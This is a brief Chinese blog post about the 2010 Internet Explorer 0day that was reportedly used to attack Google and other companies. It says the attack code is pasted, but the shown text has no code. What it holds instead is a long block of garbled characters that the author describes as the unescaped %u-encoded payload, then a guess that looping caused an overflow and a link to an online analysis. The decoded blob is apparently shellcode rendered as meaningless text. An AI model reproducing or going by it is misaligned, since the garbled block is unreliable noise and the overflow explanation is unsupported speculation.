IE 0day，2010传说中的攻击Google等公司的代码

 

谷歌退出中国事件是中国互联网的大事，随便搜搜就能找到大量的信息，新闻+流言满天飞。其中Google的官方声明中提到，包括Google在内的30多家公司受到来自中国的攻击，就是利用了IE 0day的漏洞，并得到微软证实，后者发布补丁。

 

今天看到了传说中的攻击代码，贴如下，

 

 

 

 

 

简单调试了一下，将中间的%u编码unescape后，是一堆乱码：

 

 

 

ﳽ 㾘遏䉁邟亓䎘乂亐ﰧ顁⾙⟖鎓⟵鍂䚛홉ﱁ㝏韽銖䝈鏽䫹ﷸ魉陃䇹﵃䢒❇䀧䭊䚑陆䃸首훖鉂ﱉ㿹ﶖ䬧❆➑㾘䋼䥃都⽀⾗淋䣽㽀䙈釖頷䟸ﷸ顉䦐㞒鍈⽊顆遁홎顋 䟖累鉈䡁䄧鄧鉊醒⽂顂馗但鞒雽乇䩃䉃❁㼿䅎鍀鍀䮛䍋銓횓銑﵀醐酈鞛䚑䂖仵ﳸ䝈侑㾖酉㞟ﲟ侒䏽饊供饃䪙❀粒䡉䁆鼧鉋䝆ﱏ䎟䧖饂䚑乇鎐䥀煉䏹 鼷䊖陇䊑䪛龖酃魇顂䛽鄧逿鎘䎒홋銙䡉餯ﱎ䪟馘❆仼䊑鋖佃❆➓䢘䍂齈䙏阿䤿䆓馟㼧䡂ﳼ䨿齋鿽䌯鿼齀䚙雸龓⽋䉇鿸䢟龖䢛➒饁䭊䂘䆐仵䛽䫽龑隐䆖顎顈ﳼ䊟﷖ 陂㝆颗䠧錯鍎⽋乊䎙但鮟⿖侑齀䝎鞟齂䥋鎛靉鍎䍇䍃䣵亓횑䍉䯼鍆㽀䉉鮑駹㞘䥁都➖㾐靁㽀홏䝀遁䁉❂䥋低飽䣼鬷佊侘飼䂖䁂⾐䡆䍎䪟鍃鍏䛵䚖䆛銖逿䇽䡂䉋 䮑䫸﴿鋹⽇䮗賂齁䞟陋䦓䂘㽊馛逯䦖鬧魇亖鉋㝇醗䇹齇靀䤷䙊齁䌿䡋齂魏䥆酉鮑䡎鿸⾗䉊⽈䉈鮗侘䘷뭏悊숙줱䮱췚瓙ㅟ๟弃茎摍㟻ꇐ䖯혭䊬⥘鍍ꌺꊨ흨 鞹鎼ᯬ꼄�ᠫ㣳餅蔲姉祕踐䂵쏛薴⬆廤鹌⌐㰙ᬟ㥡䃛䀱੐ꬾ㿈靝㒃掕鴒賤늪༯࿆뉌쯐栮칕ﮉ⫍⼫릋萧ᬫ鴍遐犰嚖놹쾷ᝧ჈죏婬ᷢĖ텫먤絫줿≙䗫 ꯒ鄵蘕ඁ⧨ӱ累㺡ﺆ뼪⬧蒇徼畨詔ꩧ땄쎭修Ⱖ䕆쐨媔瑊밑昘ᙷ᾵�裉歧淽鰩綈泞�牉䯲�鸡㬂ą滽蠝텫텻ꎊ턑Ꮲ艁尗뙜즋奸ശ궦⾍㣦뗨伞瘘

看到这么多循环，貌似是因此造成的溢出所致。

 

参考

http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js